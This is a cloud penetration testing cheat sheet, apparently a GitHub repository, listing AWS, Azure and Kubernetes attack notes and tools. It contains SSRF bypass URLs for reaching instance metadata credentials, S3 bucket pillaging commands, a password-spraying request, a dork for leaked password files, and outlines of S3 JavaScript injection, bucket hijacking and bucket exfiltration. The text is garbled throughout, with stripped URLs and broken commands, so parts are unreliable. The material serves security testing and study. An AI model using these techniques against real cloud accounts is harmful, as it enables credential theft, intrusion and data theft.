Cloud Penetration Testing



A curateinfrastrucd list of cloud pentesting resource, contains AWS, Azure, Google Cloud


  • AWS basic info
    • mapping workflow
      • infrastructure mapping
      • service / container mapping
      • subdomain enum
      • url/resource mapping
      • method enum
      aws network public-ip list -- table aws s3 ls --profile <profile name>
    • amazon ARN arn:partition:service:region:account-id:resource-type/resource-id arn:aws:iam::123456789012:user/Development/product_1234/*
    • amazon IAM
      • amazon identify and access management service
      • RBAC = role base access control
      • ABAC = Atribute base acces controll
      • IAM has user versioning : V1,V2,…
    • KMS
      • key managment service
      • is not ephemeral like access key id and secret key id in IAM
      • use for data encrypt/decrypt S3

Auth methods:

  • Programmatic access – Access + Secret Key
    • Secret Access Key and Access Key ID for authenticating via scripts and CLI
  • Management Console Access
    • Web Portal Access to AWS


  • AWS Usage
    • Some web applications may pull content directly from S3 buckets
    • Look to see where web resources are being loaded from to determine if S3 buckets are being utilized
    • Burp Suite
    • Navigate application like you normally would and then check for any requests to:
      • https://[bucketname]
      • https://s3-[region][OrgName]


  • Amazon Simple Storage Service (S3)
    • Storage service that is “secure by default”
    • Configuration issues tend to unsecure buckets by making them publicly accessible
    • Nslookup can help reveal region
    • S3 URL Format:
      • https://[bucketname]
      • https://s3-[region][Org Name]
        • aws s3 ls s3://bucket-name-here –region
        • aws s3api get-bucket-acl –bucket bucket-name-here
        • aws s3 cp readme.txt s3://bucket-name-here –profile newuserprofile

EBS Volumes:

  • Elastic Block Store (EBS)
  • AWS virtual hard disks
  • Can have similar issues to S3 being publicly available
  • Difficult to target specific org but can find widespread leaks


  • Like virtual machines
  • SSH keys created when started, RDP for Windows.
  • Security groups to handle open ports and allowed IPs.

AWS Instance Metadata URL

  • Cloud servers hosted on services like EC2 needed a way to orient themselves because of how dynamic they are
  • A “Metadata” endpoint was created and hosted on a non-routable IP address at
  • Can contain access/secret keys to AWS and IAM credentials
  • Server compromise or SSRF vulnerabilities might allow remote attackers to reach it
  • IAM credentials can be stored here:
  • Can potentially hit it externally if a proxy service (like Nginx) is being hosted in AWS.
    • curl –proxy && echo

Other bypasses

  • aws eks list-clusters | jq -rc ‘.clusters’
aws eks update-kubeconfig --name example
kubectl get secrets
  • SSRF AWS Bypasses to access metadata endpoint.
Converted Decimal IP: http://2852039166/latest/meta-data/
IPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/
IPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/

Interesting metadata instance urls:

http://instance-data[ROLE NAME][ROLE NAME][ID]/openssh-key

Find subdomains

  • Bruteforcing
python3 -d -D subdomains-top1mil-5000.txt -t brt
import_keys --all

S3 attack

  • S3 Bucket Pillaging
  • GOAL: Locate Amazon S3 buckets and search them for interesting data
  • In this lab you will attempt to identify a publicly accessible S3 bucket hosted by an organization. After identifying it you will list out the contents of it and download the files hosted there.
~$ sudo apt-get install python3-pip
~$ git clone
~$ cd pacu
~$ sudo bash
~$ sudo aws configure
~$ sudo python3

Pacu > import_keys --all
# Search by domain
Pacu > run s3__bucket_finder -d glitchcloud 
# List files in bucket
Pacu > aws s3 ls s3://glitchcloud
# Download files
Pacu > aws s3 sync s3://glitchcloud s3-files-dir
  • S3 Code Injection
  • Backdoor JavaScript in S3 Buckets used by webapps
  • In March, 2018 a crypto-miner malware was found to be loading on MSN’s homepage
  • This was due to AOL’s advertising platform having a writeable S3 bucket, which was being served by MSN
  • If a webapp is loading content from an S3 bucket made publicly writeable attackers can upload malicious JS to get executed by visitors
  • Can perform XSS-type attacks against webapp visitors
  • Hook browser with Beef
  • Domain Hijacking
    • Hijack S3 domain by finding references in a webapp to S3 buckets that don’t exist anymore
    • Or… subdomains that were linked to an S3 bucket with CNAME’s that still exist
    • When assessing webapps look for 404’s to *
    • When brute forcing subdomains for an org look for 404’s with ‘NoSuchBucket’ error
    • Go create the S3 bucket with the same name and region
    • Load malicious content to the new S3 bucket that will be executed when visitors hit the site

AWS lambda

# If blocked try to read other vars:


  • Check if company is using Azure AD:
- If NameSpaceType is "Managed", the company uses Azure AD
  • Auth methods:
    • Password Hash Synchronization
      • Azure AD Connect
      • On-prem service synchronizes hashed user credentials to Azure
      • User can authenticate directly to Azure services like O365 with their internal domain credential
    • Pass Through Authentication
      • Credentials stored only on-prem
      • On-prem agent validates authentication requests to Azure AD
      • Allows SSO to other Azure apps without creds stored in cloud
    • Active Directory Federation Services (ADFS)
      • Credentials stored only on-prem
      • Federated trust is setup between Azure and on-prem AD to validate auth requests to the cloud
      • For password attacks you would have to auth to the on-prem ADFS portal instead of Azure endpoints
    • Certificate-based auth
      • Client certs for authentication to API
      • Certificate management in legacy Azure Service Management (ASM) makes it impossible to know who created a cert (persistence potential)
    • Conditional access policies
    • Long-term access tokens
      • Authentication to Azure with oAuth tokens
      • Desktop CLI tools that can be used to auth store access tokens on disk
    • Legacy authentication portals


  • O365 Usage
  • User enumeration on Azure can be performed at
  • Microsoft Azure Storage:
    • Microsoft Azure Storage is like Amazon S3
    • Blob storage is for unstructured data
    • Containers and blobs can be publicly accessible via access policies
    • Predictable URL’s at
    • The “Blob” access policy means anyone can anonymously read blobs, but can’t list the blobs in the container
    • The “Container” access policy allows for listing containers and blobs
    • Microburst
  • Password Attacks
    • Password Spraying Microsoft Online (Azure/O365)
    POST /common/oauth2/token HTTP/1.1 Accept: application/json Content-Type: application/x-www-form-urlencoded Host: Content-Length: 195 Expect: 100-continue Connection: close dac224a7b894&client_info=1&grant_type=password& d=Winter2020&scope=openid
  • Interesting metadata instance urls:

Basic Azure AD concepts and tips

  • Source of authentication for Office 365, Azure Resource Manager, and anything else you integrate with it.
  • Azure AD principals
    • Users
    • Devices
    • Applications
  • Azure AD roles
    • RBAC Roles are only used for Azure Resource Manager
    • Office 365 uses administrator roles exclusively
  • Azure AD applications
    • Microsoft Graph

Azure Block Blobs (S3 equivalent) attacks

* Discovering with Google Dorks
site:* ext:xlsx | ext:csv "password"
* Discovering with Dns enumeration
python -d -w subdomains-100.txt

Cloud Labs

CDN – Comain Fronting

Golden SAML attack

  • azure work with SAML, if we can
  • SAML : security assertion markup language, use with XML and SSO login page, like office365
  • azure AD support 70 pre-define RBAC
  • ADFS is a SAML Idp with Active Directory
  • shimit : A tool that implements the Golden SAML attack

Azure Tips

  • azure vms like aws EC2 for computing
  • azure serverless function calls “azure function”, we can attack with owasp top 10 to native cloud.
  • we can eecute script like python,bash,powershell for hacking azure!
    • install customscript tools in extention section of VM azure
    • code execution on azure
  • indows container there is no GUI, with install mimikatz on this container and loaded we can lateralmovement!

cloud native

  • GRPC : design for cloud native serialization protocol
  • session state storage : resdis / memcache
  • deployment CI/CD : jenkins , travis , atlasian
  • ngrok : expose a local port to internet behind WAF like netcat
  • native cloud BUG :
    • account takeover
    • owasp top 10
    • ssrf (meta-data)
    • command injection
    • sql injection
  • (service mesh == cloud native application == kubernetis) != micro service

kubernetes tools

  • kube-hunter : Hunt for security weaknesses in Kubernetes clusters
  • trivy : Scanner for vulnerabilities in container images, file systems, and Git repositories, as well as for configuration issues and hard-coded secrets
  • CeWL : CeWL is a Custom Word List Generator with site crowler
  • proxycannon-ng : A private botnet using multiple cloud environments for pentesters and red teamers. – Built by the community during a hackathon at the WWHF 2018 security conference
  • domainhunter : Checks expired domains for categorization/reputation and history to determine good candidates for phishing and C2 domain names
  • peirates : Peirates – Kubernetes Penetration Testing tool

password attack method

  • credential stuffing attack
  • bruteforce
  • dictionary

cloud pivoting = exfiltration bucket

aws s3 sync s3://source/*   s3://destionation/*

Docker Containerole

  • Stateful instance of an image with a writable layer
  • Contains everything needed to run your application


  • Kubernetes is a security orchestrator
  • Kubernetes master provides an API to interact with nodes
  • Each Kubernetes node run kubelet to interact with API and kube-proxy to refect Kubernetes networking services on each node.
  • Kubernetes objects are abstractions of states of your system.
  • Pods: collection of container share a network and namespace in the same node.
  • Services: Group of pods running in the cluster.
  • Volumes: directory accesible to all containers in a pod. Solves the problem of loose info when container crash and restart.
  • Namespaces: scope of Kubernetes objects, like a workspace (dev-space).

Microsoft Graph

with call azure api we can manage all message of exchange and sharepoint

important Tips from course sans 588



The Cloud Pentesting is a github repository by kh4sh3i